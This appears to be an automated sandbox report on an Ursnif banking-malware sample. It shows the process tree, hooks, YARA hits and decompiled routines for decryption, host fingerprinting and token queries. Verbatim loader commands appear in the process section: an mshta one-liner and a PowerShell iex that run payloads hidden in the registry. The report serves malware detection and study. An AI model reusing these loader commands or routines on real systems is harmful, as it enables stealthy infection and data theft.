                                                      CreateProcessWINLINE0xFF 0xF2 0x25 0x50 0x00 0x00
                                                      CreateProcessAEAT7FFB70FF520E
                                                      CreateProcessAINLINE0xFF 0xF2 0x25 0x50 0x00 0x00
                                                      Process: explorer.exe, Module: user32.dll
                                                      Function NameHook TypeNew Data
                                                      api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessWIAT7FFB70FF5200
                                                      api-ms-win-core-registry-l1-1-0.dll:RegGetValueWIAT612777C
                                                      Process: explorer.exe, Module: WININET.dll
                                                      Function NameHook TypeNew Data
                                                      api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessWIAT7FFB70FF5200
                                                      api-ms-win-core-registry-l1-1-0.dll:RegGetValueWIAT612777C

                                                      Statistics

                                                      CPU Usage

                                                      Click to jump to process

                                                      Memory Usage

                                                      Click to jump to process

                                                      High Level Behavior Distribution

                                                      Click to dive into process behavior distribution

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      Analysis Process: wscript.exe PID: 5464 Parent PID: 3388

                                                      General

                                                      Start time:06:59:00
                                                      Start date:10/09/2021
                                                      Path:C:\Windows\System32\wscript.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\start[526268].vbs'
                                                      Imagebase:0x7ff782620000
                                                      File size:163840 bytes
                                                      MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Chronological Activities

                                                      Analysis Process: WmiPrvSE.exe PID: 5832 Parent PID: 792

                                                      General

                                                      Start time:07:01:44
                                                      Start date:10/09/2021
                                                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                      Imagebase:0x7ff66d5c0000
                                                      File size:488448 bytes
                                                      MD5 hash:A782A4ED336750D10B3CAF776AFE8E70
                                                      Has elevated privileges:true
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate

                                                      Chronological Activities

                                                      Analysis Process: rundll32.exe PID: 5004 Parent PID: 5832

                                                      General

                                                      Start time:07:01:45
                                                      Start date:10/09/2021
                                                      Path:C:\Windows\System32\rundll32.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
                                                      Imagebase:0x7ff69a210000
                                                      File size:69632 bytes
                                                      MD5 hash:73C519F050C20580F8A62C849D49215A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Chronological Activities

                                                      Analysis Process: rundll32.exe PID: 3128 Parent PID: 5004

                                                      General

                                                      Start time:07:01:45
                                                      Start date:10/09/2021
                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer
                                                      Imagebase:0x1220000
                                                      File size:61952 bytes
                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000022.00000003.629988077.0000000005768000.00000004.00000040.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000022.00000003.629867995.0000000005768000.00000004.00000040.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000022.00000003.630014606.0000000005768000.00000004.00000040.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000022.00000003.635124598.00000000056E9000.00000004.00000040.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000022.00000003.636741172.000000000556C000.00000004.00000040.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000022.00000003.629893415.0000000005768000.00000004.00000040.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000022.00000003.630002882.0000000005768000.00000004.00000040.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000022.00000003.629914117.0000000005768000.00000004.00000040.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000022.00000003.629947951.0000000005768000.00000004.00000040.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000022.00000003.632901205.0000000005768000.00000004.00000040.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000022.00000003.635073393.000000000566A000.00000004.00000040.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000022.00000003.629835886.0000000005768000.00000004.00000040.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000022.00000002.678786013.00000000053EF000.00000004.00000040.sdmp, Author: Joe Security
                                                      Reputation:high

                                                      Chronological Activities

                                                      Analysis Process: WmiPrvSE.exe PID: 5336 Parent PID: 792

                                                      General

                                                      Start time:07:02:16
                                                      Start date:10/09/2021
                                                      Path:C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
                                                      Imagebase:0x3c0000
                                                      File size:426496 bytes
                                                      MD5 hash:7AB59579BA91115872D6E51C54B9133B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate

                                                      Chronological Activities

                                                      Analysis Process: WmiPrvSE.exe PID: 4088 Parent PID: 792

                                                      General

                                                      Start time:07:02:23
                                                      Start date:10/09/2021
                                                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                      Imagebase:0x7ff66d5c0000
                                                      File size:488448 bytes
                                                      MD5 hash:A782A4ED336750D10B3CAF776AFE8E70
                                                      Has elevated privileges:true
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate

                                                      Chronological Activities

                                                      Analysis Process: mshta.exe PID: 1956 Parent PID: 3388

                                                      General

                                                      Start time:07:02:24
                                                      Start date:10/09/2021
                                                      Path:C:\Windows\System32\mshta.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>F67r='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(F67r).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
                                                      Imagebase:0x7ff6a90e0000
                                                      File size:14848 bytes
                                                      MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate

                                                      Chronological Activities

                                                      Analysis Process: powershell.exe PID: 4216 Parent PID: 1956

                                                      General

                                                      Start time:07:02:25
                                                      Start date:10/09/2021
                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
                                                      Imagebase:0x7ff785e30000
                                                      File size:447488 bytes
                                                      MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Yara matches:
                                                      • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000027.00000002.678335130.0000019D8B7B0000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Ursnif_2, Description: Yara detected Ursnif, Source: 00000027.00000002.699212470.0000019D9BA17000.00000004.00000001.sdmp, Author: Joe Security
                                                      Reputation:high

                                                      Chronological Activities

                                                      Analysis Process: conhost.exe PID: 6028 Parent PID: 4216

                                                      General

                                                      Start time:07:02:26
                                                      Start date:10/09/2021
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff6b2800000
                                                      File size:625664 bytes
                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high

                                                      Chronological Activities

                                                      Analysis Process: csc.exe PID: 4624 Parent PID: 4216

                                                      General

                                                      Start time:07:02:32
                                                      Start date:10/09/2021
                                                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1cv1ijms\1cv1ijms.cmdline'
                                                      Imagebase:0x7ff758a80000
                                                      File size:2739304 bytes
                                                      MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:.Net C# or VB.NET
                                                      Reputation:moderate

                                                      Chronological Activities

                                                      Analysis Process: cvtres.exe PID: 5920 Parent PID: 4624

                                                      General

                                                      Start time:07:02:33
                                                      Start date:10/09/2021
                                                      Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESFECC.tmp' 'c:\Users\user\AppData\Local\Temp\1cv1ijms\CSC65E6130637C74F63B377719165F577CE.TMP'
                                                      Imagebase:0x7ff62db00000
                                                      File size:47280 bytes
                                                      MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate

                                                      Chronological Activities

                                                      Disassembly

                                                      Code Analysis

                                                      Reset < >

                                                        Analysis Process: rundll32.exe PID: 3128 Parent PID: 5004 rundll32.exeCOMMON

                                                        Executed Functions

                                                        Function 01203276, Relevance: 19.7, APIs: 13, Instructions: 163encryptionCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 58%
                                                        			E01203276(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				int _v8;
				long* _v12;
				int _v16;
				BYTE* _v20;
				long* _v24;
				void* _v39;
				char _v40;
				void _v56;
				int _v60;
				intOrPtr _v64;
				void _v67;
				char _v68;
				void* _t61;
				int _t68;
				signed int _t76;
				int _t79;
				int _t81;
				int _t85;
				long _t86;
				int _t90;
				signed int _t94;
				int _t101;
				BYTE* _t102;
				int _t103;
				void* _t104;
				void* _t105;
				void* _t106;

				_t103 = __eax;
				_t94 = 6;
				_v68 = 0;
				memset( &_v67, 0, _t94 << 2);
				_t105 = _t104 + 0xc;
				asm("stosw");
				asm("stosb");
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				asm("stosb");
				_t61 =  *0x120a0dc( &_v24, 0, 0, 0x18, 0xf0000000); // executed
				if(_t61 == 0) {
					_a8 = GetLastError();
				} else {
					_t101 = 0x10;
					memcpy( &_v56, _a8, _t101);
					_t106 = _t105 + 0xc;
					_v60 = _t101;
					_v67 = 2;
					_v64 = 0x660e;
					_v68 = 8;
					_t68 = CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12); // executed
					if(_t68 == 0) {
						_a8 = GetLastError();
					} else {
						_push(0);
						_push( &_v40);
						_push(1);
						_push(_v12);
						if( *0x120a0b8() == 0) {
							_a8 = GetLastError();
						} else {
							_t18 = _t103 + 0xf; // 0x10
							_t76 = _t18 & 0xfffffff0;
							if(_a4 != 0 && _t76 == _t103) {
								_t76 = _t76 + _t101;
							}
							_t102 = E01205FBC(_t76);
							_v20 = _t102;
							if(_t102 == 0) {
								_a8 = 8;
							} else {
								_v16 = 0;
								_a8 = 0;
								while(1) {
									_t79 = 0x10;
									_v8 = _t79;
									if(_t103 <= _t79) {
										_v8 = _t103;
									}
									memcpy(_t102, _a12, _v8);
									_t81 = _v8;
									_a12 = _a12 + _t81;
									_t103 = _t103 - _t81;
									_t106 = _t106 + 0xc;
									if(_a4 == 0) {
										_t85 = CryptDecrypt(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8);
									} else {
										_t85 =  *0x120a0d4(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20);
									}
									if(_t85 == 0) {
										break;
									}
									_t90 = _v8;
									_v16 = _v16 + _t90;
									_t102 =  &(_t102[_t90]);
									if(_t103 != 0) {
										continue;
									} else {
										L17:
										 *_a16 = _v20;
										 *_a20 = _v16;
									}
									goto L21;
								}
								_t86 = GetLastError();
								_a8 = _t86;
								if(_t86 != 0) {
									E012013CC(_v20);
								} else {
									goto L17;
								}
							}
						}
						L21:
						CryptDestroyKey(_v12);
					}
					CryptReleaseContext(_v24, 0);
				}
				return _a8;
			}






























                                                        0x0120327f
                                                        0x01203285
                                                        0x01203288
                                                        0x0120328e
                                                        0x0120328e
                                                        0x01203290
                                                        0x01203292
                                                        0x01203295
                                                        0x0120329b
                                                        0x0120329c
                                                        0x0120329d
                                                        0x012032a3
                                                        0x012032a8
                                                        0x012032ae
                                                        0x012032b6
                                                        0x01203413
                                                        0x012032bc
                                                        0x012032be
                                                        0x012032c7
                                                        0x012032cc
                                                        0x012032de
                                                        0x012032e1
                                                        0x012032e5
                                                        0x012032ec
                                                        0x012032f0
                                                        0x012032f8
                                                        0x012033fe
                                                        0x012032fe
                                                        0x012032fe
                                                        0x01203302
                                                        0x01203303
                                                        0x01203305
                                                        0x01203310
                                                        0x012033ea
                                                        0x01203316
                                                        0x01203316
                                                        0x01203319
                                                        0x0120331f
                                                        0x01203325
                                                        0x01203325
                                                        0x0120332d
                                                        0x01203331
                                                        0x01203334
                                                        0x012033db
                                                        0x0120333a
                                                        0x01203340
                                                        0x01203343
                                                        0x01203346
                                                        0x01203348
                                                        0x0120334b
                                                        0x0120334e
                                                        0x01203350
                                                        0x01203350
                                                        0x0120335a
                                                        0x0120335f
                                                        0x01203362
                                                        0x01203365
                                                        0x01203367
                                                        0x01203370
                                                        0x0120339a
                                                        0x01203372
                                                        0x01203383
                                                        0x01203383
                                                        0x012033a2
                                                        0x00000000
                                                        0x00000000
                                                        0x012033a4
                                                        0x012033a7
                                                        0x012033aa
                                                        0x012033ae
                                                        0x00000000
                                                        0x012033b0
                                                        0x012033bf
                                                        0x012033c5
                                                        0x012033cd
                                                        0x012033cd
                                                        0x00000000
                                                        0x012033ae
                                                        0x012033b2
                                                        0x012033ba
                                                        0x012033bd
                                                        0x012033d4
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x012033bd
                                                        0x01203334
                                                        0x012033ed
                                                        0x012033f0
                                                        0x012033f0
                                                        0x01203405
                                                        0x01203405
                                                        0x0120341d

                                                        APIs
                                                        • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,01206E82,00000001,01204A9F,00000000), ref: 012032AE
                                                        • memcpy.NTDLL(01206E82,01204A9F,00000010,?,?,?,01206E82,00000001,01204A9F,00000000,?,012071BA,00000000,01204A9F,?,00000000), ref: 012032C7
                                                        • CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 012032F0
                                                        • CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 01203308
                                                        • memcpy.NTDLL(00000000,00000000,05769630,00000010), ref: 0120335A
                                                        • CryptEncrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,05769630,00000020,?,?,00000010), ref: 01203383
                                                        • CryptDecrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,05769630,?,?,00000010), ref: 0120339A
                                                        • GetLastError.KERNEL32(?,?,00000010), ref: 012033B2
                                                        • GetLastError.KERNEL32 ref: 012033E4
                                                        • CryptDestroyKey.ADVAPI32(00000000), ref: 012033F0
                                                        • GetLastError.KERNEL32 ref: 012033F8
                                                        • CryptReleaseContext.ADVAPI32(?,00000000), ref: 01203405
                                                        • GetLastError.KERNEL32(?,?,?,01206E82,00000001,01204A9F,00000000,?,012071BA,00000000,01204A9F,?,00000000,01204A9F,00000000,05769630), ref: 0120340D
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDecryptDestroyEncryptImportParamRelease
                                                        • String ID:
                                                        • API String ID: 1967744295-0
                                                        • Opcode ID: b44a990021cd99dee04e66746b2e1adfc3969db9336bd129f0711d78641ae833
                                                        • Instruction ID: 2c5f05307c34414c82ae35dbff4b0ac3da50b679bbadea4e6e731b552f873c00
                                                        • Opcode Fuzzy Hash: b44a990021cd99dee04e66746b2e1adfc3969db9336bd129f0711d78641ae833
                                                        • Instruction Fuzzy Hash: B5517571910209FFDF12DFA8DC88AAEBBB9FB04340F008525FA15E7282D7719954CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01206CD6, Relevance: 12.1, APIs: 8, Instructions: 102memoryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 96%
                                                        			E01206CD6(char __eax, signed int* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t63;
				signed int* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				signed int* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x120a2c8; // 0xbd092303
					_v12 = _t59;
				}
				_t64 = _t69;
				E012059CB( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x120a2d0 ^ 0x46d76429;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x120a290, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t63 = _t62;
								 *_t69 =  *_t69 ^ E012056BF(_v8 + _v8, _t63);
							}
							HeapFree( *0x120a290, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8);
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x120a290, 0, _t34 + _t34);
					if(_t68 != 0) {
						if(GetComputerNameW(_t68,  &_v8) != 0) {
							_t63 = _t68;
							_t69[3] = _t69[3] ^ E012056BF(_v8 + _v8, _t63);
						}
						HeapFree( *0x120a290, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *(_t67 + 8) = _t63;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				_t69[1] = _t69[1] ^ _t39;
				return _t39;
			}




















                                                        0x01206cd6
                                                        0x01206cde
                                                        0x01206ce4
                                                        0x01206ce7
                                                        0x01206cea
                                                        0x01206cec
                                                        0x01206cf1
                                                        0x01206cf1
                                                        0x01206cf7
                                                        0x01206cf9
                                                        0x01206d06
                                                        0x01206d67
                                                        0x01206d08
                                                        0x01206d0d
                                                        0x01206d13
                                                        0x01206d18
                                                        0x01206d26
                                                        0x01206d2a
                                                        0x01206d39
                                                        0x01206d40
                                                        0x01206d47
                                                        0x01206d47
                                                        0x01206d52
                                                        0x01206d52
                                                        0x01206d2a
                                                        0x01206d18
                                                        0x01206d69
                                                        0x01206d6f
                                                        0x01206d79
                                                        0x01206d7b
                                                        0x01206d80
                                                        0x01206d8f
                                                        0x01206d93
                                                        0x01206d9e
                                                        0x01206da5
                                                        0x01206dac
                                                        0x01206dac
                                                        0x01206db8
                                                        0x01206db8
                                                        0x01206d93
                                                        0x01206dc1
                                                        0x01206dc3
                                                        0x01206dc6
                                                        0x01206dc8
                                                        0x01206dcb
                                                        0x01206dce
                                                        0x01206dd8
                                                        0x01206ddc
                                                        0x01206de0

                                                        APIs
                                                        • GetUserNameW.ADVAPI32(00000000,0120453B), ref: 01206D0D
                                                        • RtlAllocateHeap.NTDLL(00000000,0120453B), ref: 01206D24
                                                        • GetUserNameW.ADVAPI32(00000000,0120453B), ref: 01206D31
                                                        • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,0120453B,?,?,?,?,?,012068F7,?,00000001), ref: 01206D52
                                                        • GetComputerNameW.KERNEL32(00000000,00000000), ref: 01206D79
                                                        • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 01206D8D
                                                        • GetComputerNameW.KERNEL32(00000000,00000000), ref: 01206D9A
                                                        • HeapFree.KERNEL32(00000000,00000000), ref: 01206DB8
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: HeapName$AllocateComputerFreeUser
                                                        • String ID:
                                                        • API String ID: 3239747167-0
                                                        • Opcode ID: cfab322ad711493e649a7752276f9d08a925a7729d7c0a6ad9c6e74cebc24380
                                                        • Instruction ID: 34637be058ffd2bc9eb2d56f6334b313cdfc240101fd6d8d3d80fa6cc0d6ebfd
                                                        • Opcode Fuzzy Hash: cfab322ad711493e649a7752276f9d08a925a7729d7c0a6ad9c6e74cebc24380
                                                        • Instruction Fuzzy Hash: 7C31327161020AEFDB22DFA9EC85BAEBBF9FB44300F504169E605D7252D771DA509B10
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 012040DC, Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 38%
                                                        			E012040DC(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E01205FBC(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E012013CC(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}



















                                                        0x012040e9
                                                        0x012040ea
                                                        0x012040eb
                                                        0x012040ec
                                                        0x012040ed
                                                        0x012040f1
                                                        0x012040f8
                                                        0x01204107
                                                        0x0120410a
                                                        0x0120410d
                                                        0x01204114
                                                        0x01204117
                                                        0x0120411a
                                                        0x0120411d
                                                        0x01204120
                                                        0x0120412b
                                                        0x0120412d
                                                        0x01204136
                                                        0x0120413e
                                                        0x01204140
                                                        0x01204152
                                                        0x0120415c
                                                        0x01204160
                                                        0x0120416f
                                                        0x01204173
                                                        0x0120417c
                                                        0x01204184
                                                        0x01204184
                                                        0x01204186
                                                        0x01204186
                                                        0x0120418e
                                                        0x01204194
                                                        0x01204198
                                                        0x01204198
                                                        0x012041a3

                                                        APIs
                                                        • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 01204123
                                                        • NtOpenProcessToken.NTDLL(00000000,00000008,00000000), ref: 01204136
                                                        • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 01204152
                                                          • Part of subcall function 01205FBC: RtlAllocateHeap.NTDLL(00000000,00000000,01202035), ref: 01205FC8
                                                        • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 0120416F
                                                        • memcpy.NTDLL(00000000,00000000,0000001C), ref: 0120417C
                                                        • NtClose.NTDLL(00000000), ref: 0120418E
                                                        • NtClose.NTDLL(00000000), ref: 01204198
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                                        • String ID:
                                                        • API String ID: 2575439697-0
                                                        • Opcode ID: b7272e94a707509c63fd35744dddc3a5d7bb6650f348399adfd681383e2972e0
                                                        • Instruction ID: 8c02539e24f94ec57d3f116735f0bc901d0e0f1c8b2f90a9516f9a208ee0b04d
                                                        • Opcode Fuzzy Hash: b7272e94a707509c63fd35744dddc3a5d7bb6650f348399adfd681383e2972e0
                                                        • Instruction Fuzzy Hash: 8B214A72A10219BBDF12EF94DC489DEBFBDEF08750F104116F605E6152D7718A509FA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0120682B, Relevance: 10.6, APIs: 7, Instructions: 73sleepmemorytimeCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 73%
                                                        			E0120682B(signed int __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				char _v32;
				long _v40;
				void* _t14;
				void* _t16;
				int _t18;
				signed int _t20;
				void* _t22;
				signed int _t23;
				intOrPtr _t25;
				unsigned int _t29;
				signed int _t34;
				signed int _t41;

				_t34 = __edx;
				_t14 = HeapCreate(0, 0x400000, 0); // executed
				 *0x120a290 = _t14;
				if(_t14 != 0) {
					 *0x120a180 = GetTickCount();
					_t16 = E01201DFA(_a4);
					if(_t16 != 0) {
						L10:
						return _t16;
					} else {
						goto L3;
					}
					do {
						L3:
						GetSystemTimeAsFileTime( &_v12);
						_t18 = SwitchToThread();
						_t29 = _v12.dwHighDateTime;
						_t20 = (_t29 << 0x00000020 | _v12.dwLowDateTime) >> 5;
						_push(0);
						_push(0x13);
						_push(_t29 >> 5);
						_push(_t20);
						L01207F3A();
						_t41 = _t18 + _t20;
						_t22 = E01201FE8(_a4, _t41);
						_t23 = 3;
						Sleep(_t23 << (_t41 & 0x00000007)); // executed
					} while (_t22 == 1);
					_t25 =  *0x120a2ac; // 0x2f0
					_v32 = 0;
					if(_t25 != 0) {
						__imp__(_t25,  &_v32);
						if(_t25 == 0) {
							_v40 = 0;
						}
						if(_v40 != 0) {
							 *0x120a2b8 = 1; // executed
						}
					}
					_t16 = E0120435F(_t34); // executed
					goto L10;
				}
				_t16 = 8;
				goto L10;
			}
















                                                        0x0120682b
                                                        0x01206840
                                                        0x01206848
                                                        0x0120684d
                                                        0x01206860
                                                        0x01206865
                                                        0x0120686c
                                                        0x012068f7
                                                        0x012068fd
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x01206872
                                                        0x01206872
                                                        0x01206877
                                                        0x0120687d
                                                        0x01206883
                                                        0x0120688d
                                                        0x01206891
                                                        0x01206892
                                                        0x01206897
                                                        0x01206898
                                                        0x01206899
                                                        0x0120689e
                                                        0x012068a4
                                                        0x012068af
                                                        0x012068b6
                                                        0x012068bc
                                                        0x012068c1
                                                        0x012068c8
                                                        0x012068cc
